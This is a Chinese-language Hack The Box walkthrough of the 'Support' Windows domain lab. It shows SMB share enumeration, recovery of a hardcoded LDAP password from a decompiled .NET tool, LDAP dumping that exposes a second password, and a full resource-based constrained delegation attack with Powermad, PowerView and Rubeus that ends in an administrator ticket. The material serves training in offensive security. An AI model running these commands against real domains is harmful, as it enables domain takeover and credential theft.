Support-htb-writeup

0x00 靶场技能介绍

章节技能：SMB匿名访问、DNSpy反编译.NET 二进制文件、密文解密、ldapsearch枚举域用户信息、滥用基于资源的受限委派

参考链接：https://0xdf.gitlab.io/2022/12/17/htb-support.html

参考链接：https://vandanpathak.com/htb-writeups/support-htb-writeup-and-rbcd-attack/

0x01 用户权限获取

1、获取下靶机IP地址：10.10.11.174

2、扫描下开放端口情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,88,123 --min-rate=10000 10.10.11.174 -sU -sC -sV 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-20 16:39 CST
Nmap scan report for 10.10.11.174
Host is up (0.32s latency).

PORT    STATE SERVICE      VERSION
53/udp  open  domain       (generic dns response: NOTIMP)
| fingerprint-strings: 
|   NBTStat: 
|_    CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
88/udp  open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-20 08:39:46Z)
123/udp open  ntp          NTP v3
| ntp-info: 
|_  
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-UDP:V=7.94SVN%I=7%D=3/20%Time=65FAA0E1%P=aarch64-unknown-linux-g
SF:nu%r(NBTStat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAA
SF:AAAAAAAAAAAAAAAA\0\0!\0\x01");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.69 seconds


┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.11.174 -oG allports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49668/tcp open  unknown
49676/tcp open  unknown
49679/tcp open  unknown
49757/tcp open  unknown
51350/tcp open  unknown


┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49676,49679,49757,51350,  



┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49676,49679,49757,51350 --min-rate=10000 -sC -sV 10.10.11.174
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-03-20 08:39:27Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49679/tcp open  msrpc         Microsoft Windows RPC
49757/tcp open  msrpc         Microsoft Windows RPC
51350/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-03-20T08:41:54
|_  start_date: N/A
|_clock-skew: -1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

3、绑定下本地hosts域名

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.174 support.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.11.174 support.htb

4、SMB服务匿名访问和枚举

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -L 10.10.11.174 -N           

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        support-tools   Disk      support staff tools
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.174 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.11.174\\NETLOGON -N
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit
                                                                                                               
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.11.174\\support-tools -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul 21 01:01:06 2022
  ..                                  D        0  Sat May 28 19:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 19:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 19:19:55 2022
  putty.exe                           A  1273576  Sat May 28 19:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 19:19:31 2022
  UserInfo.exe.zip                    A   277499  Thu Jul 21 01:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 19:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 19:19:43 2022

                4026367 blocks of size 4096. 970934 blocks available
smb: \> get UserInfo.exe.zip
getattrib: NT_STATUS_IO_TIMEOUT
smb: \> get getSMBecho failed (NT_STATUS_INVALID_NETWORK_RESPONSE). The connection is disconnected now
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \ge


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.11.174\\support-tools -N
Try "help" to get a list of possible commands.
smb: \> get UserInfo.exe.zip
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (40.6 KiloBytes/sec) (average 40.6 KiloBytes/sec)
smb: \> exit


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.11.174\\SYSVOL -N
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit

5、解压发现的压缩包内容

┌──(kali㉿offsec)-[~/Desktop/userinfo]
└─$ cat UserInfo.exe.config 
<?xml version="1.0" encoding="utf-8"?>
<configuration>
    <startup> 
        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" />
    </startup>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
</configuration>  

6、使用strings查看下UserInfo.exe文件信息

┌──(kali㉿offsec)-[~/Desktop/userinfo]
└─$ strings UserInfo.exe                 
!This program cannot be run in DOS mode.
.text
`.rsrc
@.reloc
,Er
,ZsE
BSJB
v4.0.30319
#Strings
#GUID
#Blob
<Main>d__0
<>u__1
Task`1
CommandLineParser`1
TaskAwaiter`1
IParserResult`1
Int32
<OnExecuteAsync>d__2
Command`2
Int64
<Module>
<Main>
get_ASCII
mscorlib
ParseAsync
OnExecuteAsync
get_PropertiesToLoad
Protected
AwaitUnsafeOnCompleted
get_IsCompleted
System.Collections.Specialized
<UserName>k__BackingField
<LastName>k__BackingField
<FirstName>k__BackingField
<Verbose>k__BackingField
MatthiWare.CommandLine.Abstractions.Command
getPassword
enc_password
get_Message
IDisposable
Console
set_AppName
get_UserName
set_UserName
get_LastName
set_LastName
get_FirstName
set_FirstName
username
FromFileTime
DateTime
FindOne
MatthiWare.CommandLine
WriteLine
IAsyncStateMachine
SetStateMachine
stateMachine
ValueType
set_AuthenticationType
OnConfigure
ReadOnlyCollectionBase
get_Verbose
set_Verbose
verbose
Dispose
Create
<>1__state
Write
RequiredAttribute
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
NameAttribute
AsyncStateMachineAttribute
DefaultValueAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
value
UserInfo.exe
System.Threading
Encoding
System.Runtime.Versioning
FromBase64String
ToString
GetString
MatthiWare.CommandLine.Abstractions.Parsing
get_Task
FindAll
Program
get_Item
System
CancellationToken
cancellationToken
Main
System.Reflection
ResultPropertyValueCollection
StringCollection
SearchResultCollection
ResultPropertyCollection
SetException
Description
UserInfo
AsyncTaskMethodBuilder
ICommandConfigurationBuilder
<>t__builder
DirectorySearcher
FindUser
GetUser
printUser
CommandLineParser
TaskAwaiter
GetAwaiter
set_Filter
IEnumerator
GetEnumerator
.ctor
.cctor
System.Diagnostics
UserInfo.Commands
DiscoverCommands
UserInfo.Services
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.DirectoryServices
DebuggingModes
get_Properties
AuthenticationTypes
MatthiWare.CommandLine.Core.Attributes
GetBytes
args
System.Threading.Tasks
Contains
System.Collections
commandOptions
GlobalOptions
FindUserOptions
GetUserOptions
CommandLineParserOptions
options
get_HasErrors
Concat
Object
get_Default
SearchResult
GetResult
SetResult
get_Current
get_Count
Start
Convert
last
first
MoveNext
System.Text
GetExecutingAssembly
LdapQuery
query
DirectoryEntry
entry
WrapNonExceptionThrows
UserInfo
Copyright 
  2022
$5a280d0b-9fd0-4701-8f96-82e2f1ea9dfb
1.0.0.0
.NETFramework,Version=v4.8
FrameworkDisplayName
.NET Framework 4.8 
UserInfo.Program+<Main>d__0
/UserInfo.Commands.FindUser+<OnExecuteAsync>d__2
.UserInfo.Commands.GetUser+<OnExecuteAsync>d__2
username
Username
first
First name
last
        Last name
verbose
Verbose output
RSDS
C:\Users\0xdf\source\repos\UserInfo\obj\Release\UserInfo.pdb
_CorExeMain
mscoree.dll

7、还是没有什么大的发现，但是入口点感觉肯定在这里

8、这里参考任务4提示：由于这是一个 .NET 二进制文件，因此 DNSpy 和 ILSpy 等程序将有效返回源代码。或者，运行二进制文件（在 Windows 或 Wine 中）并使用 Wireshark 捕获身份验证。

9、我需要使用工具进行反编译来看看

this.entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);

private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

10、通过跟进函数，发现了这个硬编码的密码信息

namespace UserInfo.Services
{
	// Token: 0x02000006 RID: 6
	internal class Protected
	{
		// Token: 0x0600000F RID: 15 RVA: 0x00002118 File Offset: 0x00000318
		public static string getPassword()
		{
			byte[] array = Convert.FromBase64String(Protected.enc_password);
			byte[] array2 = array;
			for (int i = 0; i < array.Length; i++)
			{
				array2[i] = (array[i] ^ Protected.key[i % Protected.key.Length] ^ 223);
			}
			return Encoding.Default.GetString(array2);
		}

		// Token: 0x04000005 RID: 5
		private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

		// Token: 0x04000006 RID: 6
		private static byte[] key = Encoding.ASCII.GetBytes("armando");
	}
}

11、这里需要解码一下：

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3                    
Python 3.11.7 (main, Dec  8 2023, 14:22:46) [GCC 13.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from base64 import b64decode
>>> from itertools import cycle
>>> pass_b64 = b"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
>>> key = b"armando"
>>> enc = b64decode(pass_b64)
>>> [e^k^223 for e,k in zip(enc, cycle(key))]
[110, 118, 69, 102, 69, 75, 49, 54, 94, 49, 97, 77, 52, 36, 101, 55, 65, 99, 108, 85, 102, 56, 120, 36, 116, 82, 87, 120, 80, 87, 79, 49, 37, 108, 109, 122]
>>> bytearray([e^k^223 for e,k in zip(enc, cycle(key))]).decode()
'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
>>> 

12、使用crackmapexec工具验证账号密码是否可以使用

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb support.htb -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
SMB         support.htb     445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB         support.htb     445    DC               [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz 

13、感觉可以，那就上bloodhound开始信息收集吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ bloodhound-python -c ALL -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -d support.htb -ns 10.10.11.174
INFO: Found AD domain: support.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.support.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.support.htb

14、出现报错了，先绑定下本地的hosts信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.174 dc.support.htb" | sudo tee -a /etc/hosts
10.10.11.174 dc.support.htb

15、继续开始信息收集

┌──(kali㉿offsec)-[~/Desktop]
└─$ bloodhound-python -c ALL -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -d support.htb -dc dc.support.htb  -ns 10.10.11.174 --zip
INFO: Found AD domain: support.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 21 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Management.support.htb
INFO: Querying computer: dc.support.htb
WARNING: DCE/RPC connection failed: SMB SessionError: STATUS_INVALID_PARAMETER(An invalid parameter was passed to a service or function.)
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: SMB SessionError: STATUS_INVALID_PARAMETER(An invalid parameter was passed to a service or function.)
WARNING: DCE/RPC connection failed: SMB SessionError: STATUS_INVALID_PARAMETER(An invalid parameter was passed to a service or function.)
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 01M 43S
INFO: Compressing output into 20240320204202_bloodhound.zip

16、启动 neo4j 数据库

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo neo4j start
[sudo] kali 的密码：
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:19004). It is available at http://localhost:7474
There may be a short delay until the server is ready.

17、哗哗哗一阵分析，没啥头绪 = =

18、参考引导模式，使用 ldapsearch 枚举整个数据库的信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ ldapsearch -x -H ldap://support.htb -D ldap@support.htb -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "dc=support,dc=htb" > res.txt


····
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20220528111201.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
uSNChanged: 12630
company: support
streetAddress: Skipper Bowles Dr
name: support
objectGUID:: CqM5MfoxMEWepIBTs5an8Q==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132982099209777070
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: support
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
dSCorePropagationData: 20220528111201.0Z
dSCorePropagationData: 16010101000000.0Z
····

19、发现某个用户的账号密码信息，尝试登录

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> dir


    Directory: C:\Users\support\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         3/20/2024   6:29 PM             34 user.txt


*Evil-WinRM* PS C:\Users\support\Desktop>

20、获取到第一个flag信息

*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
4055646bc297ff4f6cdd864e2aea3739
*Evil-WinRM* PS C:\Users\support\Desktop> 

0x02 系统权限获取

21、这个时候拥有了另一个域内账号了，再次查看 Bloodhound 数据，支持用户是共享支持帐户组的成员，该组GenericAll在计算机上具有 DC.SUPPORT.HTB 对象：

我将滥用基于资源的受限委派。首先，我将在我的控制下将一台假计算机添加到域中。然后我可以充当 DC 为假计算机请求 Kerberos 票证，从而能够模拟其他帐户，例如管理员帐户。为此，我需要一个经过身份验证的用户，该用户可以将计算机添加到域中（默认情况下，任何用户最多可以添加 10 台计算机）。这是在ms-ds-machineaccountquota属性中配置的，该属性需要大于 0。最后，我需要对加入域的计算机具有写入权限（GenericALL在 DC 上我需要该权限）。

继续执行该计划，我们将使用evil-winrm将 Powermad 上传到目标服务器。随后，提供的命令将向 AD 对象添加一台假计算机，使用约束委派权限配置新的假计算机，并为这个新创建的实体生成密码哈希。

22、按照演练报告开始执行攻击

┌──(kali㉿offsec)-[~/Desktop/tools/PowerSploit]
└─$ evil-winrm -i 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> upload /home/kali/Desktop/tools/PowerSploit/PowerView.ps1
                                        
Info: Uploading /home/kali/Desktop/tools/PowerSploit/PowerView.ps1 to C:\Users\support\Desktop\PowerView.ps1
                                        
Data: 1027036 bytes of 1027036 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\support\Desktop> upload /home/kali/Desktop/tools/Powermad/Powermad.ps
/home/kali/Desktop/tools/Powermad/Powermad.ps1  /home/kali/Desktop/tools/Powermad/Powermad.psd1 /home/kali/Desktop/tools/Powermad/Powermad.psm1
*Evil-WinRM* PS C:\Users\support\Desktop> upload /home/kali/Desktop/tools/Powermad/Powermad.ps1
                                        
Info: Uploading /home/kali/Desktop/tools/PowerSploit//home/kali/Desktop/tools/Powermad/Powermad.ps1 to C:\Users\support\Desktop\Powermad.ps1
                                        
Error: Upload failed. Check filenames or paths: No such file or directory - No such file or directory /home/kali/Desktop/tools/PowerSploit/home/kali/Desktop/tools/Powermad/Powermad.ps1
*Evil-WinRM* PS C:\Users\support\Desktop> upload ../Powermad/Powermad.ps1
                                        
Info: Uploading /home/kali/Desktop/tools/PowerSploit/../Powermad/Powermad.ps1 to C:\Users\support\Desktop\Powermad.ps1
                                        
Data: 180768 bytes of 180768 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\support\Desktop> upload /home/kali/Desktop/tools/Rubeus/Rubeus.exe
                                        
Info: Uploading /home/kali/Desktop/tools/PowerSploit//home/kali/Desktop/tools/Rubeus/Rubeus.exe to C:\Users\support\Desktop\Rubeus.exe
                                        
Error: Upload failed. Check filenames or paths: No such file or directory - No such file or directory /home/kali/Desktop/tools/PowerSploit/home/kali/Desktop/tools/Rubeus/Rubeus.exe
*Evil-WinRM* PS C:\Users\support\Desktop> upload ../Rubeus/Rubeus.exe
                                        
Info: Uploading /home/kali/Desktop/tools/PowerSploit/../Rubeus/Rubeus.exe to C:\Users\support\Desktop\Rubeus.exe
                                        
Data: 369320 bytes of 369320 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\support\Desktop> dir


    Directory: C:\Users\support\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         3/20/2024   7:50 PM         135576 Powermad.ps1
-a----         3/20/2024   7:44 PM         770279 PowerView.ps1
-a----         3/20/2024   7:59 PM         276992 Rubeus.exe
-ar---         3/20/2024   6:29 PM             34 user.txt


*Evil-WinRM* PS C:\Users\support\Desktop> 

*Evil-WinRM* PS C:\Users\support\Desktop> Import-Module ./Powermad.ps1
*Evil-WinRM* PS C:\Users\support\Desktop> Import-Module ./PowerView.ps1

23、我将验证用户是否可以将计算机添加到域中

*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota

ms-ds-machineaccountquota
-------------------------
                       10


*Evil-WinRM* PS C:\Users\support\Desktop> 

24、我还需要确保环境中有 2012 年以上的 DC：

*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainController | select name,osversion | fl


Name      : dc.support.htb
OSVersion : Windows Server 2022 Standard



*Evil-WinRM* PS C:\Users\support\Desktop> 

25、最后，我想检查是否msds-allowedtoactonbehalfofotheridentity为空：

*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainComputer DC | select name,msds-allowedtoactonbehalfofotheridentity | fl


name                                     : DC
msds-allowedtoactonbehalfofotheridentity :



*Evil-WinRM* PS C:\Users\support\Desktop> 

26、创建假计算机，我将使用 PowermadNew-MachineAccount来创建一台假计算机：

*Evil-WinRM* PS C:\Users\support\Desktop> New-MachineAccount -MachineAccount 0xdfFakeComputer -Password $(ConvertTo-SecureString '0xdf0xdf123' -AsPlainText -Force)
[+] Machine account 0xdfFakeComputer added
*Evil-WinRM* PS C:\Users\support\Desktop> 

27、我还需要计算机对象的 SID，因此我将其保存在变量中：

*Evil-WinRM* PS C:\Users\support\Desktop> $fakesid = Get-DomainComputer 0xdfFakeComputer | select -expand objectsid
*Evil-WinRM* PS C:\Users\support\Desktop> $fakesid
S-1-5-21-1677581083-3380853377-188903654-5601
*Evil-WinRM* PS C:\Users\support\Desktop> 

28、攻击现在，我将配置 DC 以信任我的假计算机代表它做出授权决策。这些命令将使用假计算机的 SID 创建 ACL 并将其分配给 DC：

*Evil-WinRM* PS C:\Users\support\Desktop> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"
*Evil-WinRM* PS C:\Users\support\Desktop> $SDBytes = New-Object byte[] ($SD.BinaryLength)
*Evil-WinRM* PS C:\Users\support\Desktop> $SD.GetBinaryForm($SDBytes, 0)
*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} 
Warning: [Set-DomainObject] Error setting/replacing properties for object 'MANAGEMENT$' : Exception calling "CommitChanges" with "0" argument(s): "Access is denied.
"
*Evil-WinRM* PS C:\Users\support\Desktop> 

29、我将验证它是否有效：

*Evil-WinRM* PS C:\Users\support\Desktop> $RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
*Evil-WinRM* PS C:\Users\support\Desktop> $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
*Evil-WinRM* PS C:\Users\support\Desktop> $Descriptor.DiscretionaryAcl


BinaryLength       : 36
AceQualifier       : AccessAllowed
IsCallback         : False
OpaqueLength       : 0
AccessMask         : 983551
SecurityIdentifier : S-1-5-21-1677581083-3380853377-188903654-5601
AceType            : AccessAllowed
AceFlags           : None
IsInherited        : False
InheritanceFlags   : None
PropagationFlags   : None
AuditFlags         : None



*Evil-WinRM* PS C:\Users\support\Desktop> 

30、我的假计算机有一个 ACL，SecurityIdentifier上面写着AccessAllowed。验证为假计算机，我将用来Rubeus获取我的假计算机帐户的哈希值：

*Evil-WinRM* PS C:\Users\support\Desktop> .\Rubeus.exe hash /password:0xdf0xdf123 /user:0xdfFakeComputer /domain:support.htb

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4


[*] Action: Calculate Password Hash(es)

[*] Input password             : 0xdf0xdf123
[*] Input username             : 0xdfFakeComputer
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTB0xdffakecomputer
[*]       rc4_hmac             : B1809AB221A7E1F4545BD9E24E49D5F4
[*]       aes128_cts_hmac_sha1 : F7A01B9628299B9FB8A93CFCCF8E747C
[*]       aes256_cts_hmac_sha1 : 90499A3696F8B07B9CDB02E919F193768519340F7812F6050177E6997262B6F0
[*]       des_cbc_md5          : 76EF4F97ADD99176

*Evil-WinRM* PS C:\Users\support\Desktop> 

31、我需要标记为 的那个rc4_hmac，我将把它传递给Rubeus管理员以获得一张票：

*Evil-WinRM* PS C:\Users\support\Desktop> .\Rubeus.exe s4u /user:0xdfFakeComputer$ /rc4:B1809AB221A7E1F4545BD9E24E49D5F4 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4

[*] Action: S4U

[*] Using rc4_hmac hash: B1809AB221A7E1F4545BD9E24E49D5F4
[*] Building AS-REQ (w/ preauth) for: 'support.htb\0xdfFakeComputer$'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFvjCCBbqgAwIBBaEDAgEWooIEzTCCBMlhggTFMIIEwaADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqAD
      AgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0YqOCBIcwggSDoAMCARKhAwIBAqKCBHUEggRx2rT/vWFT
      Z7DGr713wbsTWKklBoxuLSIw7NlT3hHbA81Fi4HBXvNWDYnh2bBvjqv3dsieIxUlvAVRUyw8eDa/HL3Q
      Vtr125qOiUWRaeDXhLX0W5YJyCSzgHQHPwF7Sy9ajE9WuZCR9zKwuAKRj5hSYUXMGgIaLj157QA0BXVJ
      z9YHY67el4ajF/DzB4E9wxs0+rP4nEVqtOGJ3RQu0tAQ29TWoHAy7JDL83tUjigkjL5NxNwzE6YfbOCM
      iTZw6AcA1H4CNv3L9/aqZUtihqC9fh7pyf+6nRcnJnUwXykqFBX4LKUm85eAdBm9sWtFCxoEbn89AMNY
      7YytepyvZvY2HwH9QkpORyBp+Q2h2TX1khxyXc1vVbQc7zfj2rTjNYzxuStRkTuVGr0GtehYVi5PE8L2
      VY4sGjyKAycKyGM2brtBzQ2aVjFT/xqQENSZ3EzeLqlSNNW4zYjqFPVv2j7iqxkfQcc3Z8Rq8Zzpv2eu
      DuNrBU61Ys8OESetuAnjiHCIQ4VaguUh7aqS3YL57IQPy0QWMiqanOduMbPmtKD5KVrqddwIgQ7J28vD
      ax2u/eq5Ekkun7noO82Cwju2SPgH8dFcjti2b4XsSgMcSkRy76V4EMetoIG/8yZNxaQwB7B+Rc7nubpN
      QHgiQy5IRQlDuIZ5yX65WE4M/m1j3QcRF/2Aah61ccs+bmOiGe7tLvIEn9gVj3GVm0RbcdAEs/z9fhoK
      azb34cFE33r8WNNKEG9jGnRvY7H62iphGfItJZMGWkTS+Nf1WhLpN/xA/qqUuIgT0XmL3olBVmWWOmdI
